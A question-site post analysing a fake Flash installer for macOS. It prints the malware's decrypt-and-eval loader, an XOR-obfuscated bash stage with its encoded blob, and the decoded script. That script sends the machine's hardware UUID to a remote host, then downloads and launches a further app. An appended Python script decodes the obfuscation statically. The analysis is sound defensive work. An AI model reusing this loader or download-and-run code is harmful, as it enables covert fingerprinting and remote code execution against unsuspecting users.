What is this fake Flash installer trying to do?

Time: 2019-07-06 14:47:51

Tags: bash disassembly spyware

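My dear tween daughter was trying to install a Minecraft mod... one of the mods used one of those horrible link redirectors that tries to get you to install something that looks like a Flash installer, but obviously isn't.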

Trying to figure out what kind of damage has been done...

Checking the code signature:

/private/tmp/Player-2.dmg: code object is not signed at all

OK.. strange that Gatekeeper didn't freak out on install; the metadata must have been stripped somehow.

Checking the "installer":

Executable=/Volumes/Player/Player_785.app/Contents/MacOS/Iu_msA_jv4L_i3E0
Identifier=com.Iu_msA_jv4L_i3E0
Format=app bundle with generic
CodeDirectory v=20200 size=212 flags=0x0(none) hashes=1+3 location=embedded
Signature size=9057
Authority=Developer ID Application: Centoza Daisy (MP54HNP636)
Authority=Developer ID Certification Authority
Authority=Apple Root CA
Timestamp=Jul 1, 2019 at 12:32:28 PM
Info.plist entries=12
TeamIdentifier=MP54HNP636
Sealed Resources version=2 rules=13 files=3
Internal requirements count=2 size=232

Searching for "Centoza Daisy" and permutations thereof turns up nothing.

Now I'm wondering what's up with the executable... I found out it's not a binary... file tells me it's bash... and it contains 4 lines (post shebang):

cd "$(dirname "$BASH_SOURCE")"
fileDir="$(dirname "$(pwd -P)")"
cd "$fileDir"/Resources
eval "$(openssl enc -base64 -d -aes-256-cbc -nosalt -pass "pass:7125667785" <enc)"

In Resources there are 3 files: an icns file and 2 base64-encoded files, which I assume are the key and the payload, enc and enc2 respectively.

I gather the eval is trying to run whatever gets decrypted from these 2 files... it would work... I don't know how, but let's remove the eval and see what happens...

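Well, crap, more happened than I intended... I was just trying to output the contents of the decrypted file and accidentally tried to run it... I should have removed the subshell...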

./Iu_msA_jv4L_i3E0: line 5: #!/bin/bash
tmp_path="$(mktemp -d /tmp/XXXXXXXXX)"
pass="7125667785"
tmp_app="$tmp_path/Player_${pass: -3}.app"
openssl enc -base64 -d -aes-256-cbc -nosalt -out "$tmp_path/installer.zip" -pass "pass:$pass" <enc2
unzip "$tmp_path/installer.zip" -d "$tmp_path" > /dev/null 2>&1
chmod 777 "$tmp_app/Contents/MacOS/*"
open -a "$tmp_app": No such file or directory

I guess this computer is burned, so I might as well use it and assess the damage...

#!/bin/bash
tmp_path="$(mktemp -d /tmp/XXXXXXXXX)"
pass="7125667785"
tmp_app="$tmp_path/Player_${pass: -3}.app"
openssl enc -base64 -d -aes-256-cbc -nosalt -out "$tmp_path/installer.zip" -pass "pass:$pass" <enc2
unzip "$tmp_path/installer.zip" -d "$tmp_path" > /dev/null 2>&1
chmod 777 "$tmp_app/Contents/MacOS/*"
open -a "$tmp_app"

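Basically, it looks like it saves the enc2 file as a zip in a tmp directory, then unzips it... marks the app's contents as executable, and then tries to open it... so now we have what they intended... I guess we can help them along, hopefully without accidentally fully executing what they wanted.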

$ openssl enc -base64 -d -aes-256-cbc -nosalt -out "fake_installer.zip" -pass "pass:7125667785" < Resources/enc2

OK, check it:

$ ls
Info.plist      MacOS           Resources       _CodeSignature      fake_installer.zip
$ file fake_installer.zip 
fake_installer.zip: Zip archive data, at least v1.0 to extract

Looks good, let's peel another layer off the onion.

Archive:  fake_installer.zip
   creating: Player_785.app/
   creating: Player_785.app/Contents/
   creating: Player_785.app/Contents/_CodeSignature/
  inflating: Player_785.app/Contents/_CodeSignature/CodeResources  
  inflating: Player_785.app/Contents/_CodeSignature/CodeDirectory  
  inflating: Player_785.app/Contents/_CodeSignature/CodeRequirements-1  
  inflating: Player_785.app/Contents/_CodeSignature/CodeSignature  
  inflating: Player_785.app/Contents/_CodeSignature/CodeRequirements  
   creating: Player_785.app/Contents/MacOS/
  inflating: Player_785.app/Contents/MacOS/Iu_msA_jv4L_i3E0  
   creating: Player_785.app/Contents/Resources/
  inflating: Player_785.app/Contents/Resources/app7125667785.icns  
  inflating: Player_785.app/Contents/Resources/785  
  inflating: Player_785.app/Contents/Resources/enc  
  inflating: Player_785.app/Contents/Info.plist  

Wow, they code-signed the hidden app as well

Oh, Centoza... persistent, if nothing else...

Executable=/private/tmp/Player_playground/Player_785.app/Contents/Player_785.app/Contents/MacOS/Iu_msA_jv4L_i3E0
Identifier=com.Iu_msA_jv4L_i3E0
Format=app bundle with generic
CodeDirectory v=20200 size=212 flags=0x0(none) hashes=1+3 location=embedded
Signature size=9058
Authority=Developer ID Application: Centoza Daisy (MP54HNP636)
Authority=Developer ID Certification Authority
Authority=Apple Root CA
Timestamp=Jul 1, 2019 at 12:32:25 PM
Info.plist entries=12
TeamIdentifier=MP54HNP636
Sealed Resources version=2 rules=13 files=3
Internal requirements count=2 size=232

The inner fake installer is the same as the first... the law of entropy dictates this has to end somewhere.

But the decoded bash is more complex...

_l() {
    _i=0;_x=0;
    for ((_i=0; _i<${#1}; _i+=2)) do 
        __return_var="$__return_var$(printf "%02x" $(( ((0x${1:$_i:2})) ^ ((0x${2:$_x:2})) )) )"
        if (( (_x+=2)>=${#2} )); then ((_x=0)); fi
    done
    if [[ "$3" ]]; then eval "$3='$__return_var'"; else echo -n "$__return_var"; fi
}

_m() {
    _v=$(base64 --decode <(printf "$1"));_k=$(xxd -pu <(printf "$2"));
    __return_var="$(xxd -r -p <(_l "$_v" "$_k"))"
    if [[ "$3" ]]; then eval "$3='$__return_var'"; else echo -n "$__return_var"; fi
}
_y="7125667785"
_t="MTQxMDFkNTc1ZjU4MTg1NTU5NDY1ZjNiNTQ0MDU4NTU0MzVlNTc1YjE3NTY1NzQxNjA1OTViNDI1NTUwNzk1MDVmNTAxZTFmMTc0YzMyMTUxNzExMTI1MDRlNTU1YjQyNWM1MDUzNzU1YjQ3NDUwYjFmMTAxNzYzNTg1ZDQ3NTg1MzQ1MTg2NzRhNTA1NTVlNWQ0MTE5MTExNzEwMTc2MzU4NWQ0NzU4NTM0NTE4N2E1OTU2NWU1ZjQ2NWE0NTVlMTc3ZjdjMWExMDExMTUxYTYwNTk1YjQyNTU1MDQ0MWU2MDUwNTU1OTQxNTI0YTRjMTgxNjFiM2YzYzE2MTcxNzE4NTM1ODQzMTI0MzU5NWE0MjVhNWQ3MTVlNDMxMjVjNTgxNjE4NjE1NzU5NDI1YzU3NDYxOTFjMTgzZDE4MTUxNzExNTY1YTNjMTYxNzE3MTgxNTE3MTExMjQ2NWQ1ZjQ3MGEwODNmMTcxMTEyMTUxNjE2MTcxNzVlNWE0NTExNTc0ZDU1NWE0MjUzNWQ1MTczNTg0MDE1NWY1ODE3MTUxYzRlNTI0OTUxNTk0MzUyNTI1MzdjNWM0NTQyNjk3NTZiNGIxNTNkMTgxNTE3MTExMjE1MTYxNjUzNTgzMjE1MTcxMTEyMTUxNjE2MTcxNzE4MTUxNzU4NTQxNTZkNmQxNzE1MWM1MDRmNTI1ZTQwNTI1MzUzNzM1MTQ3MTUxMTBmMDgxNjE0MTM0MTU3NTk0MjVjNTc3MTVmNDQxNTE3NjU2ODBjMTE0NjVkNTM1ODNkMTcxODE1MTcxMTEyMTUxNjE2MTcxNzE4MTUxNzExMTI0NjVkNWY0NzBhMDkzZjE3MTExMjE1MTYxNjE3MTcxODE1MTcxMTEyMTUxNjE2NTU0NTVkNTQ1YzBhMzgxNTE2MTYxNzE3MTgxNTE3MTExMjE1MTY1MDVlM2QxODE1MTcxMTEyMTUxNjE2NTM1ODU2NTAzZDExMTIxNTE2MTYxNzE3MTg1YzUxMTE2OTE1MTI0NTVjNWU0ODE1MGEwYzEyMDQxNjZiMGMxNzRjNWQ1MjVmMzgxNTE2MTYxNzE3MTgxNTE3MTExMjE1MTY1NTU4NTk0YzVjNTk0NDU3MGUzYzE2MTcxNzE4MTUxNzExMTI1MzVmMTYzZDE3MTgxNTE3MTExMjE1MTYzYzE3MTcxODE1MTcxMTEyMTU1ZjUwMTc2YzE4MTg1MzExMTAxMTQwNTk1YjQyNTU1MDczNTg0MDFhMTIwNzE1MTc2NTBlMTc0NTVhNTA1ODNjMTcxNzE4MTUxNzExMTIxNTE2MTYxNzE3NWQ1NjVmNWUxMjE3MTI0MDU4NWI0ZDU4NTI3NTViNDcxNDBkM2QxNzE4MTUxNzExMTIxNTE2MTYxNzE3MTg0NzUyNDU0NzQ3NTgwZDE3M2QxODE1MTcxMTEyMTUxNjE2NTE1ZTMyMTUxNzExMTI1MTU5NTg1MjNkNDUzZjU0NDQ0MDQ3NTM1ODQzNzM1MTQ3MGExMzE2NjU2MTcyMTUzZDU5NDU0Nzc1NWI0NzBiMTQxMzFmNWM1YzQ1NWY1MzU4NTMxNjEzMWY1YzVjNDU1ZjUzNTg1MzE2MTUxMzViNDA0NTQzNTc1YjQyNzI1ZTQ1MWExYzFlMTMzODU0NDY0Njc5NTY1NTUwMGExMzE2MWQ1NDU3NDQ1MjU2NTQ1YTU0MTIxNzEyNTc0NzQ3N2M1YzQ1MTMxYjE3M2M0MDU4NWI0ZDU4NTI2ZTVjNTQ1YjUzMGExNTFjMWQ1MDU0NDY2MzU5NWE0MjVhNWQ3YjU2NWM1NzE1MTQxMjU2NDc0ODdiNTY1YzU3MTcxZjE0M2Q1ODRiNmE0MTU0NDA0NjVmNTk1OTBhMWExMTFmNDI0NTZhNDA1MzQ1NDQxODE4NDc0MzVkNTE0MzU1NDM2MTVkNDc0NDU4NWQ1YjFmMTQzZDQ0NWQ0NjQ0NTg1ZDViNjk1MTQyNWU1
YzA4MTUxNTFhNDA0MzVmNTM1MDVkNWIxZTEzMzg1ODU3NTU1ZjVlNTY1MDY4NTg1NjA4MTQxMjFmNTI1YjVkNTgxMTFmNWIxNjE0MTMxZjUxNWE0NTU0NTUxNTFiNDQ1MzA2MTgxODU0MTE3YjdhNjY1YTU2NDM1ZTVhNDU1Yzc3NGQ0NjUzNDU0MzdjNTA0MTU4NTE1MDE2NGExNzUwNGE1MDQ3MTExZjVhMTYxMTE1N2U3NzY1NWI1MDQ2NTM1OTQ0NWE2MjZkN2M3MzEzMTIwODE2MTQ2YjFmMTYxZjZiMTgxMDEyMTY0YTE3NDQ1ZDUxMTcxYzc3MTUxYjU4MTcxMDRiNzUxOTFiMTAxZDZkNjgxNTZhMTMxYzE1NzE2ZTA0NzY0NjEwMWUxYTE1NGIxMTQ2NDcxNjFiNTM1NDE4MTI2YzZhMDg0NTQ0NWY1OTQzMDI2ODZhMTYxYjE3M2M0MzQ1NWIwNTE3NWY0NTQ2NDUwYzE5MTg1NjQ4NWMxOTU3NWQ0NzViNTc0MzViNTc1MjE5NTI1ZDU4MTk0NTUzMTgwNzU2MGEwODY1Njc0ZjU0NjYwYTA1MTM0MjBjMTY1ODU3NTU1ZjVlNTY1MDY4NTg1NjEzNDUwYjEzNDQ1ZDQ2NDQ1ODVkNWI2OTUxNDI1ZTVjMTM1ODBjMTY1YTQ1Njk0MTUyNGE0NjVlNWU1YzEzNTQwYjAwMDYwYTAwMDEwNzA1MDIwZTAzMTUzZDRkNWI0ZDU4NDI2YTQ2NTc0NDQ0NGY1YTQ1NTUwZjE3MDMwZTAwMDAwZTAzMDIwMzAzMDIwNzAyMDMwNjBmMDQwNTA0MDQwMzAxMDEwZjAyMWEzZjQzNWM0MjZhNDY1NzQzNWYwNTE3MTMxOTVmNWU0MjUzNWE0NzE4MWE0MzVjNDIxYTZlNmU2ZjZmNjA2ZDZmNjk2YTFjMTQzYzU0NDI0YTU5MTcxYzU0MDU3YTE2MTUxMzRkNDc1YjEzMTIwYjE5NTI1MjQxMTc1YjQyNWQ1ZTE1MDQwODExMDYxODBiMDkxNTQ2NTg0NjY5NDc1NjRjNWQzZDUwNDI0NTY5NTI1ZTQ1MDUxNzEzMTk1ZjVlNDI1MzVhNDcxODE4NTMxMTFkNDE1YjQ2MTg2ZjYwNmQ2ZjY5NmE2ZDZlMWYxODE1MzI0MDU5NGI1YjQ1MTYxYjY3MTcxYTExNDI1ZjQ4NWM0NjY5NDc1NjRiNDY0MDVlNDA1MTE0MTYxNTEzNGM1ODQ3NmU0MjU0NDI1ZTE1MTcxNTUxMTcxMzE2NTQ0NjQ2Njg1MzUxNDcxNTExMGMxNTE5NTI1MjQxMTc1YjQyNWQ1ZTE1MDQwODExMDYzMjQ3NWExMTFmNTMxNjEyNDM1YTQ4NmE0NzUwNDY1ZDNjNTA1ZTViNWQ2YTU5NTA1ZjUwMGIxNDEzMWY1ZjQ3NTI0MTEyMTg1YjA3MTcxYTRlMTUxNTFiMWM1NDQ2NDYxNTE3MDQxZDViNDIxMjE4MDcxNjE1MTM1OTQ1NDc2ZTU2NWM0NDE0MWUxZTFhM2Y0MTVlNWU0MDViNTM2ODU5NTk1ODUyMGMxMDExNGQ0MDU4NWI0ZDU4NTI2ZTVjNTQ1YjUzMTgxODE4MWExMjAzMDI0ODE0M2M1NDVmNTU1YTUzMTExOTRkMTYxNDEzNTY0ODQ1Njg1NTViNDcxMjUwNWU1YjVkNmE1OTUwNWY1MDE5NzU1ODU5NGM1MDU5NDU0MTFhN2I1NzU0Nzg2YjE3MTgxYjM4NWE0NjUzNTkxNzE1NTQxNzEzMTY1NDQ2NDY2ODUzNTE0NzEzNTc1YjU5NTM2OTU5NTY1NTUwMTUxMTFmMTg1NzQ0NTA0NDE4MTc0NDEzMTIxNzEyNDU1MjQ0NGI1YzU4NWY2ZDUyNDM1ZjUzMTUxODE3MTM0NzVkNTk0MzViNTI2ODU2NTQ1YTU0MTA="
eval "$(_m "$_t" "$_y")"

I can't parse that by eyeballing it, so hopefully, without the subshell and the eval, I won't do myself in...

function getVolumeName() {
    excludedDirs=('/Volumes/Preboot/' '/Volumes/Macintosh HD/' '/Volumes/Recovery/')

    for volumeDir in /Volumes/*/
    do
        skip=0
        for excludedDir in "${excludedDirs[@]}"
        do
            if [[ "$excludedDir" == "$volumeDir" ]]; then
                skip=1
                break;
            fi
        done
        if [ $skip == 1 ]; then
            continue;
        fi 

        if [ -d "$volumeDir/$1" ]; then
            echo "$volumeDir";
            return; 
        fi
    done
}
currentDir="$PWD"
appDir="$(dirname $(dirname "$currentDir"))"
appName="$(basename "$appDir")"
volume_name="$(getVolumeName "$appName")"
os_version="$(sw_vers -productVersion)"
session_guid="$(uuidgen)"
machine_id="$(echo -n "$(ioreg -rd1 -c IOPlatformExpertDevice | grep -o '"IOPlatformUUID" = "\(.*\)"' | sed -E -n 's@.*"([^"]+)"@\1@p')" | tr -dc '[[:print:]]')"
url="http://api.formatlog.com/sd/?c=9WRybQ==&u=$machine_id&s=$session_guid&o=$os_version&b=7125667785"
unzip_password="587766521714417125667785"
tmp_path="$(mktemp /tmp/XXXXXXXXX)"
curl -f0L "$url" >/dev/null 2>&1 >>$tmp_path
app_dir="$(mktemp -d /tmp/XXXXXXXX)/"
unzip -P "$unzip_password" "$tmp_path" -d "$app_dir" > /dev/null 2>&1
rm -f $tmp_path
file_name="$(grep -m1 -v "*.app" <(ls -1 "$app_dir"))"
volume_name="${volume_name// /%20}"
chmod +x "$app_dir$file_name/Contents/MacOS"/*
open -a "$app_dir$file_name" --args "s" "$session_guid" "$volume_name"

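So it reaches out to formatlog at some URL, then opens another app downloaded from the internet... at this point we have remote code execution, 3 layers of obfuscation deep... if you could call the police on the internet, now would be the time to call them.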

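We now have a DNS record to run down... oh, it's privately registered through a company in Panama City, Panama... anyone have a copy of the Panama Papers to see who the bad guy is?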

OK.. following the white rabbit...

curl 'http://api.formatlog.com/sd/?c=9WRybQ==&u=4&s=hi&o=_HaxorSauce10.4&b=7125667785'
<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="http://dl.formatlog.com:80/sbd/7125667785/QgR_sl_bQ%3D%3D">here</a>.</h2>
</body></html>
 curl 'http://dl.formatlog.com:80/sbd/7125667785/QgR_sl_bQ%3D%3D'
PK;?N
     $Player.app/
 ??ny4???ny4???ny4?PK;?N$Player.app/Contents/
... bunch of binary stuff...

Let's see what it actually is:

$ curl 'http://dl.formatlog.com:80/sbd/7125667785/QgR_sl_bQ%3D%3D' > out.something
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  386k  100  386k    0     0  1316k      0 --:--:-- --:--:-- --:--:-- 1318k
$ file out.something 
out.something: Zip archive data, at least v2.0 to extract

Unzip time

Archive:  out.something
   creating: Player.app/
   creating: Player.app/Contents/
   creating: Player.app/Contents/_CodeSignature/
[out.something] Player.app/Contents/_CodeSignature/CodeResources password: 
   skipping: Player.app/Contents/_CodeSignature/CodeResources  incorrect password

Holy smokes... it prompts me for a password... a zip file... this paranoia is making me paranoid

Oh, but it did give me a zip password a minute ago: unzip_password="587766521714417125667785"

It worked...

$ unzip out.something 
Archive:  out.something
[out.something] Player.app/Contents/_CodeSignature/CodeResources password: 
  inflating: Player.app/Contents/_CodeSignature/CodeResources  
  inflating: Player.app/Contents/MacOS/7161204793  
  inflating: Player.app/Contents/Resources/4793.icns  
  inflating: Player.app/Contents/Resources/Player.app/Contents/_CodeSignature/CodeResources  
  inflating: Player.app/Contents/Resources/Player.app/Contents/MacOS/019347364DF9  
  inflating: Player.app/Contents/Resources/Player.app/Contents/Resources/app7161204793.icns  
  inflating: Player.app/Contents/Resources/Player.app/Contents/Info.plist  
  inflating: Player.app/Contents/Info.plist  

Codesign, rinse and repeat:

$codesign -d -vv Player.app/
Executable=/private/tmp/Player_playground/Player_785.app/Contents/Player_785.app/Contents/MacOS/jail/Player.app/Contents/MacOS/7161204793
Identifier=7161204793
Format=app bundle with Mach-O thin (x86_64)
CodeDirectory v=20200 size=970 flags=0x0(none) hashes=25+3 location=embedded
Signature size=9057
Authority=Developer ID Application: Centoza Daisy (MP54HNP636)
Authority=Developer ID Certification Authority
Authority=Apple Root CA
Timestamp=Jul 5, 2019 at 3:16:09 PM
Info.plist entries=10
TeamIdentifier=MP54HNP636
Sealed Resources version=2 rules=13 files=5
Internal requirements count=1 size=172

But this time... we have a binary... and it's hard to tell what's being executed...

$ nm -a 7161204793 
                 U _CFStringGetCStringPtr
                 U _NSApp
                 U _NSLog
                 U _OBJC_CLASS_$_NSAppleScript
                 U _OBJC_CLASS_$_NSApplication
                 U _OBJC_CLASS_$_NSArray
                 U _OBJC_CLASS_$_NSData
                 U _OBJC_CLASS_$_NSException
                 U _OBJC_CLASS_$_NSMutableArray
                 U _OBJC_CLASS_$_NSMutableData
                 U _OBJC_CLASS_$_NSMutableString
                 U _OBJC_CLASS_$_NSNull
                 U _OBJC_CLASS_$_NSObject
                 U _OBJC_CLASS_$_NSString
                 U _OBJC_EHTYPE_$_NSException
                 U _OBJC_METACLASS_$_NSObject
                 U _TransformProcessType
                 U __Block_copy
                 U __DefaultRuneLocale
                 U __NSGetExecutablePath
                 U __Unwind_Resume
                 U __ZNKSt3__112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE4findEcm
                 U __ZNKSt3__112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE7compareEmmPKcm
                 U __ZNKSt3__120__vector_base_commonILb1EE20__throw_length_errorEv
                 U __ZNKSt3__120__vector_base_commonILb1EE20__throw_out_of_rangeEv
                 U __ZNKSt3__121__basic_string_commonILb1EE20__throw_length_errorEv
                 U __ZNKSt3__16locale9use_facetERNS0_2idE
                 U __ZNKSt3__18ios_base6getlocEv
                 U __ZNSt11logic_errorC2EPKc
                 U __ZNSt12length_errorD1Ev
                 U __ZNSt3__112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6appendEPKcm
                 U __ZNSt3__112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE6resizeEmc
                 U __ZNSt3__112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE7replaceEmmPKcm
                 U __ZNSt3__112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEE9push_backEc
                 U __ZNSt3__112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEEC1ERKS5_
                 U __ZNSt3__112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEED1Ev
                 U __ZNSt3__112basic_stringIcNS_11char_traitsIcEENS_9allocatorIcEEEaSERKS5_
                 U __ZNSt3__113basic_istreamIcNS_11char_traitsIcEEED0Ev
                 U __ZNSt3__113basic_istreamIcNS_11char_traitsIcEEED1Ev
                 U __ZNSt3__113basic_ostreamIcNS_11char_traitsIcEEE6sentryC1ERS3_
                 U __ZNSt3__113basic_ostreamIcNS_11char_traitsIcEEE6sentryD1Ev
                 U __ZNSt3__113basic_ostreamIcNS_11char_traitsIcEEED0Ev
                 U __ZNSt3__113basic_ostreamIcNS_11char_traitsIcEEED1Ev
                 U __ZNSt3__113basic_ostreamIcNS_11char_traitsIcEEED2Ev
                 U __ZNSt3__113basic_ostreamIcNS_11char_traitsIcEEElsEi
                 U __ZNSt3__114basic_iostreamIcNS_11char_traitsIcEEED0Ev
                 U __ZNSt3__114basic_iostreamIcNS_11char_traitsIcEEED1Ev
                 U __ZNSt3__114basic_iostreamIcNS_11char_traitsIcEEED2Ev
                 U __ZNSt3__115basic_streambufIcNS_11char_traitsIcEEE4syncEv
                 U __ZNSt3__115basic_streambufIcNS_11char_traitsIcEEE5imbueERKNS_6localeE
                 U __ZNSt3__115basic_streambufIcNS_11char_traitsIcEEE5uflowEv
                 U __ZNSt3__115basic_streambufIcNS_11char_traitsIcEEE6setbufEPcl
                 U __ZNSt3__115basic_streambufIcNS_11char_traitsIcEEE6xsgetnEPcl
                 U __ZNSt3__115basic_streambufIcNS_11char_traitsIcEEE6xsputnEPKcl
                 U __ZNSt3__115basic_streambufIcNS_11char_traitsIcEEE9showmanycEv
                 U __ZNSt3__115basic_streambufIcNS_11char_traitsIcEEEC2Ev
                 U __ZNSt3__115basic_streambufIcNS_11char_traitsIcEEED2Ev
                 U __ZNSt3__15ctypeIcE2idE
                 U __ZNSt3__16__sortIRNS_6__lessIccEEPcEEvT0_S5_T_
                 U __ZNSt3__16localeD1Ev
                 U __ZNSt3__18ios_base33__set_badbit_and_consider_rethrowEv
                 U __ZNSt3__18ios_base4initEPv
                 U __ZNSt3__18ios_base5clearEj
                 U __ZNSt3__19basic_iosIcNS_11char_traitsIcEEED2Ev
                 U __ZSt9terminatev
                 U __ZTINSt3__113basic_istreamIcNS_11char_traitsIcEEEE
                 U __ZTINSt3__113basic_ostreamIcNS_11char_traitsIcEEEE
                 U __ZTINSt3__114basic_iostreamIcNS_11char_traitsIcEEEE
                 U __ZTINSt3__115basic_streambufIcNS_11char_traitsIcEEEE
                 U __ZTISt12length_error
                 U __ZTVN10__cxxabiv117__class_type_infoE
                 U __ZTVN10__cxxabiv120__si_class_type_infoE
                 U __ZTVSt12length_error
                 U __ZThn16_NSt3__114basic_iostreamIcNS_11char_traitsIcEEED0Ev
                 U __ZThn16_NSt3__114basic_iostreamIcNS_11char_traitsIcEEED1Ev
                 U __ZTv0_n24_NSt3__113basic_istreamIcNS_11char_traitsIcEEED0Ev
                 U __ZTv0_n24_NSt3__113basic_istreamIcNS_11char_traitsIcEEED1Ev
                 U __ZTv0_n24_NSt3__113basic_ostreamIcNS_11char_traitsIcEEED0Ev
                 U __ZTv0_n24_NSt3__113basic_ostreamIcNS_11char_traitsIcEEED1Ev
                 U __ZTv0_n24_NSt3__114basic_iostreamIcNS_11char_traitsIcEEED0Ev
                 U __ZTv0_n24_NSt3__114basic_iostreamIcNS_11char_traitsIcEEED1Ev
                 U __ZdaPv
                 U __ZdlPv
                 U __Znam
                 U __Znwm
                 U ___CFConstantStringClassReference
                 U ___bzero
                 U ___cxa_allocate_exception
                 U ___cxa_atexit
                 U ___cxa_begin_catch
                 U ___cxa_end_catch
                 U ___cxa_free_exception
                 U ___cxa_throw
                 U ___gxx_personality_v0
                 U ___objc_personality_v0
                 U ___stack_chk_fail
                 U ___stack_chk_guard
                 U __dyld_register_func_for_add_image
0000000100000000 T __mh_execute_header
                 U __objc_empty_cache
                 U __objc_empty_vtable
                 U _abort
                 U _asprintf
                 U _bzero
                 U _calloc
                 U _chmod
                 U _class_addMethod
                 U _class_addProperty
                 U _class_addProtocol
                 U _class_getInstanceMethod
                 U _class_getInstanceSize
                 U _class_getInstanceVariable
                 U _class_getIvarLayout
                 U _class_getName
                 U _class_getSuperclass
                 U _class_isMetaClass
                 U _class_replaceMethod
                 U _class_respondsToSelector
                 U _closedir
                 U _free
                 U _hash_create
                 U _hash_search
                 U _inflate
                 U _inflateEnd
                 U _inflateInit_
                 U _ivar_getName
                 U _ivar_getOffset
                 U _kCFCoreFoundationVersionNumber
                 U _malloc
                 U _memchr
                 U _memcmp
                 U _memcpy
                 U _memset
                 U _method_setImplementation
                 U _objc_allocateClassPair
                 U _objc_autoreleasePoolPop
                 U _objc_autoreleasePoolPush
                 U _objc_autoreleaseReturnValue
                 U _objc_begin_catch
                 U _objc_constructInstance
                 U _objc_copyClassNamesForImage
                 U _objc_copyCppObjectAtomic
                 U _objc_end_catch
                 U _objc_getClass
                 U _objc_getMetaClass
                 U _objc_getProtocol
                 U _objc_getRequiredClass
                 U _objc_initializeClassPair
                 U _objc_lookUpClass
                 U _objc_msgSend
                 U _objc_msgSendSuper2
                 U _objc_msgSend_stret
                 U _objc_readClassPair
                 U _objc_registerClassPair
                 U _objc_release
                 U _objc_retain
                 U _objc_retainAutorelease
                 U _objc_retainAutoreleasedReturnValue
                 U _objc_storeStrong
                 U _object_getClass
                 U _object_getIndexedIvars
                 U _object_getIvar
                 U _object_setIvar
                 U _opendir$INODE64
                 U _property_copyAttributeList
                 U _protocol_getMethodDescription
                 U _protocol_getName
                 U _pthread_mutex_lock
                 U _pthread_mutex_unlock
                 U _readdir$INODE64
                 U _sel_getUid
                 U _srand
                 U _stat$INODE64
                 U _strcmp
                 U _strlen
                 U _strncmp
                 U _time
                 U dyld_stub_binder

Some C stuff for strings, stat, plist, some Obj-C stuff, some C++ stuff. Is there any way to tell what it does without running it?
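A static decoder for the `_l`/`_m` layer shown in the post, as an added example that is not part of the original question: it reproduces the base64, hex and repeating-key XOR steps in Python so the decoded text can be read without `eval` or a subshell, then lists URLs, literal assignments and fetch/unpack/launch commands. The sample stage, its `example.invalid` URL and the `triage` and `encode_layer` helpers are constructed for illustration; only the key and the 16-character blob prefix come from the post.

```python
import base64
import binascii
import re

KEY = "7125667785"                 # _y in the post
PAGE_PREFIX = "MTQxMDFkNTc1ZjU4"   # first 16 characters of _t in the post

def xor_cycle(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR, the byte-level equivalent of the _l loop."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))

def decode_layer(t_b64: str, key: str) -> bytes:
    """Static equivalent of `_m "$_t" "$_y"`: returns the bytes, runs nothing."""
    compact = "".join(t_b64.split())          # tolerate a blob wrapped across lines
    hex_text = base64.b64decode(compact, validate=True).decode("ascii")
    if len(hex_text) % 2:
        raise ValueError("odd-length hex layer: the blob is truncated")
    return xor_cycle(binascii.unhexlify(hex_text), key.encode("ascii"))

def encode_layer(plain: bytes, key: str) -> str:
    """Inverse of decode_layer, used here only to build the constructed sample."""
    xored = xor_cycle(plain, key.encode("ascii"))
    return base64.b64encode(binascii.hexlify(xored)).decode("ascii")

# Commands worth flagging in a decoded stage (fetch, unpack, mark executable, launch).
FLAGGED = ("eval", "curl", "unzip", "chmod", "open -a", "openssl enc")

def triage(script: str) -> dict:
    """Pull URLs, literal assignments and flagged commands out of decoded text."""
    urls = re.findall(r"https?://[^\s\"']+", script)
    # Only assignments whose value is a plain literal (no $ expansion inside).
    literals = dict(re.findall(r'^\s*(\w+)="([^"$]*)"\s*$', script, re.M))
    commands = sorted(c for c in FLAGGED
                      if re.search(r"(^|[\s;|(])" + re.escape(c) + r"\b", script, re.M))
    return {"urls": urls, "literals": literals, "commands": commands}

# Constructed sample stage (not from the post); example.invalid never resolves.
SAMPLE = '''#!/bin/bash
url="http://stage2.example.invalid/sd/?b=0000000000"
unzip_password="constructed-password"
tmp_path="$(mktemp /tmp/XXXXXXXXX)"
curl -f0L "$url" >>"$tmp_path"
unzip -P "$unzip_password" "$tmp_path" -d /tmp/out
open -a "/tmp/out/Sample.app"
'''

if __name__ == "__main__":
    # The post's own blob prefix decodes to the start of a shebang line.
    print(decode_layer(PAGE_PREFIX, KEY))
    blob = encode_layer(SAMPLE.encode(), KEY)
    report = triage(decode_layer(blob, KEY).decode())
    for field, value in report.items():
        print(field, value)
```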

0 answers:

No answers